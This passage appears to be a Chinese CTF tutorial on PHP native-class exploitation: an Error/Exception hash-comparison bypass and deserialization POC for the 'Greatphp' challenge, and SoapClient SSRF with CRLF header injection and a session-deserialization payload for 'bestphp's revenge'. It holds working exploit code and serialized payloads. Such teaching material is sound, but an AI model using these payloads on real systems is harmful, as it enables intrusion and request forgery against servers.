<h5 id="绕过哈希比较"><a href="#绕过哈希比较" class="headerlink" title="绕过哈希比较"></a>绕过哈希比较</h5><h6 id="Error-Exception类"><a href="#Error-Exception类" class="headerlink" title="Error/Exception类"></a>Error/Exception类</h6><p>区别：</p>
<p>Error是用于php7, Exception类适用于php5/php7</p>
<p><code>__toString()</code>将错误的对象异常或者错误的对象转化为字符串</p>
<p>Error为例：</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token variable">$a</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">Error</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"aaa"</span><span class="token punctuation">,</span> <span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token variable">$a</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p><img src="6.png" loading="lazy"></p>
<p>抛出了错误，其中的<code>2</code>是对应的行号，但是我们可以发现其中的错误对象<code>1</code>并没有输出</p>
<p>之后测试</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token variable">$a</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">Error</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"aaa"</span><span class="token punctuation">,</span> <span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token variable">$b</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">Error</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"aaa"</span><span class="token punctuation">,</span> <span class="token number">2</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token variable">$a</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token string double-quoted-string">"\n\n"</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token variable">$b</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>结果图：</p>
<p><img src="7.png" loading="lazy"></p>
<p>我们发现<code>$a,$b</code>中的错误对象并不相同，但是返回的是相同的</p>
<p>这里必须要保证这个两个<code>Error类</code>在同一行，不然返回的值不一样</p>
<h6 id="例题-1"><a href="#例题-1" class="headerlink" title="例题"></a>例题</h6><p>极客大挑战2020 Greatphp</p>
<p>打开题目</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token function">error_reporting</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">class</span> <span class="token class-name-definition class-name">SYCLOVER</span> <span class="token punctuation">&#123;</span>
    <span class="token keyword">public</span> <span class="token variable">$syc</span><span class="token punctuation">;</span>
    <span class="token keyword">public</span> <span class="token variable">$lover</span><span class="token punctuation">;</span>

    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function-definition function">__wakeup</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
        <span class="token keyword">if</span><span class="token punctuation">(</span> <span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">syc</span> <span class="token operator">!=</span> <span class="token variable">$this</span><span class="token operator">-></span><span class="token property">lover</span><span class="token punctuation">)</span> <span class="token operator">&amp;&amp;</span> <span class="token punctuation">(</span><span class="token function">md5</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">syc</span><span class="token punctuation">)</span> <span class="token operator">===</span> <span class="token function">md5</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">lover</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token operator">&amp;&amp;</span> <span class="token punctuation">(</span><span class="token function">sha1</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">syc</span><span class="token punctuation">)</span><span class="token operator">===</span> <span class="token function">sha1</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">lover</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
           <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token operator">!</span><span class="token function">preg_match</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"/\&lt;\?php|\(|\)|\"|\'/"</span><span class="token punctuation">,</span> <span class="token variable">$this</span><span class="token operator">-></span><span class="token property">syc</span><span class="token punctuation">,</span> <span class="token variable">$match</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
               <span class="token comment">//过滤了&lt;?php ( ) " '</span>
               <span class="token keyword">eval</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">syc</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
           <span class="token punctuation">&#125;</span> <span class="token keyword">else</span> <span class="token punctuation">&#123;</span>
               <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"Try Hard !!"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
           <span class="token punctuation">&#125;</span>
           
        <span class="token punctuation">&#125;</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>

<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'great'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
    <span class="token function">unserialize</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'great'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span> <span class="token keyword">else</span> <span class="token punctuation">&#123;</span>
    <span class="token function">highlight_file</span><span class="token punctuation">(</span><span class="token constant">__FILE__</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>

<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>我们使用<code>&lt;?=</code>绕过<code>&lt;?php</code></p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php">php标签的几种写法：
    <span class="token php language-php"><span class="token delimiter important">&lt;?php</span> <span class="token delimiter important">?></span></span>
    <span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
    <span class="token operator">&lt;</span><span class="token operator">?</span> <span class="token delimiter important">?></span></span> //需要php.ini中开启short_open_tag=On
    <span class="token php language-php"><span class="token delimiter important">&lt;?=</span> <span class="token delimiter important">?></span></span>
    &lt;% %> //需要php.ini中开启asp_tags=On
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span> <span class="token attr-name">language</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>php<span class="token punctuation">"</span></span><span class="token punctuation">></span></span><span class="token script"><span class="token language-javascript">xxx</span></span><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">></span></span> <span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>禁用了括号，不能使用函数，我们使用<code>include &quot;/flag&quot;</code>包含他</p>
<p>但是同时过滤了引号，我们进行取反</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token variable">$str</span> <span class="token operator">=</span> <span class="token string double-quoted-string">"/flag"</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token function">urlencode</span><span class="token punctuation">(</span><span class="token operator">~</span><span class="token variable">$str</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token delimiter important">?></span></span>
    //%D0%99%93%9E%98<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>O对了，还有如果对一个类求他的哈希值，就会触发他的<code>__toString()</code>魔术方法，我们就可以使用前面说的方法绕过sha1和md5的比较</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php">//POC:
<span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token keyword">class</span> <span class="token class-name-definition class-name">SYCLOVER</span> <span class="token punctuation">&#123;</span>
    <span class="token keyword">public</span> <span class="token variable">$syc</span><span class="token punctuation">;</span>
    <span class="token keyword">public</span> <span class="token variable">$lover</span><span class="token punctuation">;</span>

    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function-definition function">__wakeup</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
        <span class="token keyword">if</span><span class="token punctuation">(</span> <span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">syc</span> <span class="token operator">!=</span> <span class="token variable">$this</span><span class="token operator">-></span><span class="token property">lover</span><span class="token punctuation">)</span> <span class="token operator">&amp;&amp;</span> <span class="token punctuation">(</span><span class="token function">md5</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">syc</span><span class="token punctuation">)</span> <span class="token operator">===</span> <span class="token function">md5</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">lover</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token operator">&amp;&amp;</span> <span class="token punctuation">(</span><span class="token function">sha1</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">syc</span><span class="token punctuation">)</span><span class="token operator">===</span> <span class="token function">sha1</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">lover</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
           <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token operator">!</span><span class="token function">preg_match</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"/\&lt;\?php|\(|\)|\"|\'/"</span><span class="token punctuation">,</span> <span class="token variable">$this</span><span class="token operator">-></span><span class="token property">syc</span><span class="token punctuation">,</span> <span class="token variable">$match</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
               <span class="token keyword">eval</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">syc</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
           <span class="token punctuation">&#125;</span> <span class="token keyword">else</span> <span class="token punctuation">&#123;</span>
               <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"Try Hard !!"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
           <span class="token punctuation">&#125;</span>
           
        <span class="token punctuation">&#125;</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>
<span class="token variable">$payload</span> <span class="token operator">=</span> <span class="token string double-quoted-string">"?>&lt;?=include~"</span><span class="token operator">.</span><span class="token function">urldecode</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'%D0%99%93%9E%98'</span><span class="token punctuation">)</span><span class="token operator">.</span><span class="token string double-quoted-string">"?>"</span><span class="token punctuation">;</span>
<span class="token variable">$str</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">SYCLOVER</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$str</span><span class="token operator">-></span><span class="token property">syc</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">Exception</span><span class="token punctuation">(</span><span class="token variable">$payload</span><span class="token punctuation">,</span> <span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token variable">$str</span><span class="token operator">-></span><span class="token property">lover</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">Exception</span><span class="token punctuation">(</span><span class="token variable">$payload</span><span class="token punctuation">,</span> <span class="token number">2</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token comment">//这里的php版本是7，所以Error和Exception类都可以使用</span>
<span class="token keyword">echo</span> <span class="token function">urlencode</span><span class="token punctuation">(</span><span class="token function">serialize</span><span class="token punctuation">(</span><span class="token variable">$str</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>GET传参之后</p>
<p><img src="8.png" loading="lazy"></p>
<p>成功执行payload,得到flag</p>
<h3 id="利用SoapClient类SSRF"><a href="#利用SoapClient类SSRF" class="headerlink" title="利用SoapClient类SSRF"></a>利用SoapClient类SSRF</h3><h6 id="SoapClient类学习"><a href="#SoapClient类学习" class="headerlink" title="SoapClient类学习"></a>SoapClient类学习</h6><p>php5/php7/php8</p>
<p><img src="9.png" loading="lazy"></p>
<p>我们可以看到有一个<code>__call()</code>魔术方法，如果调用触发这个 魔术方法，他会发送http/https请求</p>
<p>这个类的构造方法：</p>
<p><code>public SoapClient :: SoapClient(mixed $wsdl [，array $options ])</code></p>
<ul>
<li>第一个参数是用来指明是否是wsdl模式，将该值设为null则表示非wsdl模式。</li>
<li>第二个参数为一个数组，如果在wsdl模式下，此参数可选；如果在非wsdl模式下，则必须设置location和uri选项，其中<code>location</code>是要将请求发送到的SOAP服务器的URL，而<code>uri</code> 是SOAP服务的目标命名空间。</li>
</ul>
<h6 id="SSRF测试"><a href="#SSRF测试" class="headerlink" title="SSRF测试"></a>SSRF测试</h6><pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token comment">//需要php.ini中加载php_soap.dll扩展</span>
<span class="token variable">$a</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">SoapClient</span><span class="token punctuation">(</span><span class="token constant">null</span><span class="token punctuation">,</span> <span class="token keyword">array</span><span class="token punctuation">(</span>
    <span class="token string single-quoted-string">'location'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'http://yourip:port/aaa'</span><span class="token punctuation">,</span>
    <span class="token string single-quoted-string">'uri'</span> <span class="token operator">=></span> <span class="token string single-quoted-string">'http://yourip:port'</span>
<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$b</span> <span class="token operator">=</span> <span class="token function">serialize</span><span class="token punctuation">(</span><span class="token variable">$a</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token keyword">echo</span> <span class="token variable">$b</span><span class="token punctuation">;</span>

<span class="token variable">$c</span> <span class="token operator">=</span> <span class="token function">unserialize</span><span class="token punctuation">(</span><span class="token variable">$b</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$c</span><span class="token operator">-></span><span class="token function">aaaa</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment">//触发__call魔术方法</span>
<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>开启端口监听</p>
<p><img src="10.png" loading="lazy"></p>
<p>成功SSRF</p>
<p>其中发现SOAPAction头参数可控</p>
<p>如果我们配合CRLF漏洞的话就可以设置POST请求的body就可以控制</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token variable">$a</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">SoapClient</span><span class="token punctuation">(</span><span class="token constant">null</span><span class="token punctuation">,</span><span class="token keyword">array</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'uri'</span><span class="token operator">=></span><span class="token string double-quoted-string">"bbb\r\n\r\nPOST_request_body\r\n"</span><span class="token punctuation">,</span> <span class="token string single-quoted-string">'location'</span><span class="token operator">=></span><span class="token string single-quoted-string">'http://127.0.0.1:5555/path'</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$b</span> <span class="token operator">=</span> <span class="token function">serialize</span><span class="token punctuation">(</span><span class="token variable">$a</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token variable">$b</span><span class="token punctuation">;</span>
<span class="token variable">$c</span> <span class="token operator">=</span> <span class="token function">unserialize</span><span class="token punctuation">(</span><span class="token variable">$b</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$c</span><span class="token operator">-></span><span class="token function">not_exists_function</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p><img src="11.png" loading="lazy"></p>
<p>但是<code>Content-Type</code>在SOAPAction的上面，我们就不能控制POST请求的数据</p>
<p>其中我们发现<code>User-Agent</code>在<code>Content-Type</code>的上面，而且似乎也可控</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token variable">$target</span> <span class="token operator">=</span> <span class="token string single-quoted-string">'http://127.0.0.1:5555/path'</span><span class="token punctuation">;</span>
<span class="token variable">$post_string</span> <span class="token operator">=</span> <span class="token string single-quoted-string">'data=something'</span><span class="token punctuation">;</span>
<span class="token variable">$headers</span> <span class="token operator">=</span> <span class="token keyword">array</span><span class="token punctuation">(</span>
    <span class="token string single-quoted-string">'X-Forwarded-For: 127.0.0.1'</span><span class="token punctuation">,</span>
    <span class="token string single-quoted-string">'Cookie: PHPSESSID=my_session'</span>
    <span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$b</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">SoapClient</span><span class="token punctuation">(</span><span class="token constant">null</span><span class="token punctuation">,</span><span class="token keyword">array</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'location'</span> <span class="token operator">=></span> <span class="token variable">$target</span><span class="token punctuation">,</span><span class="token string single-quoted-string">'user_agent'</span><span class="token operator">=></span><span class="token string single-quoted-string">'RoboTerh^^Content-Type: application/x-www-form-urlencoded^^'</span><span class="token operator">.</span><span class="token function">join</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'^^'</span><span class="token punctuation">,</span><span class="token variable">$headers</span><span class="token punctuation">)</span><span class="token operator">.</span><span class="token string single-quoted-string">'^^Content-Length: '</span><span class="token operator">.</span><span class="token punctuation">(</span><span class="token keyword type-casting">string</span><span class="token punctuation">)</span><span class="token function">strlen</span><span class="token punctuation">(</span><span class="token variable">$post_string</span><span class="token punctuation">)</span><span class="token operator">.</span><span class="token string single-quoted-string">'^^^^'</span><span class="token operator">.</span><span class="token variable">$post_string</span><span class="token punctuation">,</span><span class="token string single-quoted-string">'uri'</span>      <span class="token operator">=></span> <span class="token string double-quoted-string">"aaab"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token variable">$aaa</span> <span class="token operator">=</span> <span class="token function">serialize</span><span class="token punctuation">(</span><span class="token variable">$b</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$aaa</span> <span class="token operator">=</span> <span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'^^'</span><span class="token punctuation">,</span><span class="token string double-quoted-string">"\r\n"</span><span class="token punctuation">,</span><span class="token variable">$aaa</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$aaa</span> <span class="token operator">=</span> <span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'&amp;'</span><span class="token punctuation">,</span><span class="token string single-quoted-string">'&amp;'</span><span class="token punctuation">,</span><span class="token variable">$aaa</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token variable">$aaa</span><span class="token punctuation">;</span>

<span class="token variable">$c</span> <span class="token operator">=</span> <span class="token function">unserialize</span><span class="token punctuation">(</span><span class="token variable">$aaa</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$c</span><span class="token operator">-></span><span class="token function">not_exists_function</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>实现了任意POST请求</p>
<p><img src="12.png" loading="lazy"></p>
<p>当然，在攻击redis的时候也可以通过这种方法插入redis命令</p>
<h6 id="例题-2"><a href="#例题-2" class="headerlink" title="例题"></a>例题</h6><p>bestphp’s revenge</p>
<p>打开题目</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token function">highlight_file</span><span class="token punctuation">(</span><span class="token constant">__FILE__</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$b</span> <span class="token operator">=</span> <span class="token string single-quoted-string">'implode'</span><span class="token punctuation">;</span>
<span class="token function">call_user_func</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'f'</span><span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token variable">$_POST</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">session_start</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'name'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
    <span class="token variable">$_SESSION</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'name'</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'name'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>
<span class="token function">var_dump</span><span class="token punctuation">(</span><span class="token variable">$_SESSION</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$a</span> <span class="token operator">=</span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token function">reset</span><span class="token punctuation">(</span><span class="token variable">$_SESSION</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token string single-quoted-string">'welcome_to_the_lctf2018'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">call_user_func</span><span class="token punctuation">(</span><span class="token variable">$b</span><span class="token punctuation">,</span> <span class="token variable">$a</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>通过目录扫描得到<code>/flag.php</code></p>
<p><img src="13.png" loading="lazy"></p>
<p>很明显需要我们ssrf来访问其中的<code>/flag.php</code></p>
<p>但是没有ssrf的利用点</p>
<p>我们可以想到使用php原生类<code>SoapClient</code>来触发其中的<code>__call()</code>魔术方法来进行ssrf得到flag</p>
<p>因为他是把得到的flag放在session中的，我们就需要设置一个cookie来访问这个session文件进而得到flag</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token variable">$str</span> <span class="token operator">=</span> <span class="token string double-quoted-string">"http://127.0.0.1/flag.php"</span><span class="token punctuation">;</span>
<span class="token variable">$a</span> <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">SoapClient</span><span class="token punctuation">(</span><span class="token constant">null</span><span class="token punctuation">,</span> <span class="token keyword">array</span><span class="token punctuation">(</span>
    <span class="token string single-quoted-string">'location'</span> <span class="token operator">=></span> <span class="token variable">$str</span><span class="token punctuation">,</span>
    <span class="token string single-quoted-string">'uri'</span> <span class="token operator">=></span> <span class="token string double-quoted-string">"http://127.0.0.1"</span><span class="token punctuation">,</span>
    <span class="token string single-quoted-string">'user_agent'</span> <span class="token operator">=></span> <span class="token string double-quoted-string">"RoboTerh\r\ncookie: PHPSESSID=123456\r\n"</span>
<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$payload</span> <span class="token operator">=</span> <span class="token function">urlencode</span><span class="token punctuation">(</span><span class="token function">serialize</span><span class="token punctuation">(</span><span class="token variable">$a</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">echo</span> <span class="token string double-quoted-string">"|"</span><span class="token operator">.</span><span class="token variable">$payload</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span>
//|O%3A10%3A%22SoapClient%22%3A4%3A%7Bs%3A3%3A%22uri%22%3Bs%3A16%3A%22http%3A%2F%2F127.0.0.1%22%3Bs%3A8%3A%22location%22%3Bs%3A25%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%22%3Bs%3A11%3A%22_user_agent%22%3Bs%3A40%3A%22RoboTerh%5Cr%5Cncookie%3A+PHPSESSID%3D123456%5Cr%5Cn%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>生成了反序列化的payload，但是从哪里进行反序列化入口呢</p>
<p>题目中和session有关，想到<code>session反序列化</code>这个途径</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php">//session.serialize_handler=php
<span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token function">session_start</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$_SESSION</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'name'</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token string single-quoted-string">'RoboTerh'</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>得到</p>
<blockquote>
<p>name|s:8:”RoboTerh”;</p>
</blockquote>
<pre class="line-numbers language-php" data-language="php"><code class="language-php">//session.serialize_handler=php_serialize
<span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token function">session_start</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token variable">$_SESSION</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'name'</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token string single-quoted-string">'RoboTerh'</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>得到session文件内容</p>
<blockquote>
<p>a:1:{s:4:”name”;s:8:”RoboTerh”;}</p>
</blockquote>
<p>当序列化和反序列化的时候使用不同的引擎就会导致session反序列化漏洞触发</p>
<p>当我们传入</p>
<blockquote>
<p>$_SEESION[‘key’]  = ‘|value’;</p>
</blockquote>
<p>那么使用<code>php_serialize</code>的到序列化内容为</p>
<blockquote>
<p>a:1:{s:3:’key’;s:6:’|value’;}</p>
</blockquote>
<p>如果用<code>php</code>引擎来进行反序列化的时候，用<code>|</code>分隔键名和键值的内容</p>
<p>key为：</p>
<blockquote>
<p>a:1:{s:3:’key’;s:6:’|</p>
</blockquote>
<p>value为：</p>
<blockquote>
<p>value’;}</p>
</blockquote>
<p>则：</p>
<blockquote>
<p>| + 序列化内容就可以触发漏洞</p>
</blockquote>
<p>要进行session反序列化，就需要将反序列化引擎修改为<code>php_serialize</code>(默认为<code>php</code>)</p>
<blockquote>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token function">call_user_func</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'f'</span><span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token variable">$_POST</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
</blockquote>
<p><code>call_user_func()</code>是一个回调函数，则可以构建session反序列化</p>
<p><img src="14.png" loading="lazy"></p>
<p>成功设置了PHPSESSIONID=123456</p>
<p>但是没有触发SSRF漏洞，我们需要访问一个不存在的函数触发<code>__call()</code>魔术方法，进而进行SSRF</p>
<p>发现</p>
<blockquote>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token variable">$a</span> <span class="token operator">=</span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token function">reset</span><span class="token punctuation">(</span><span class="token variable">$_SESSION</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token string single-quoted-string">'welcome_to_the_lctf2018'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
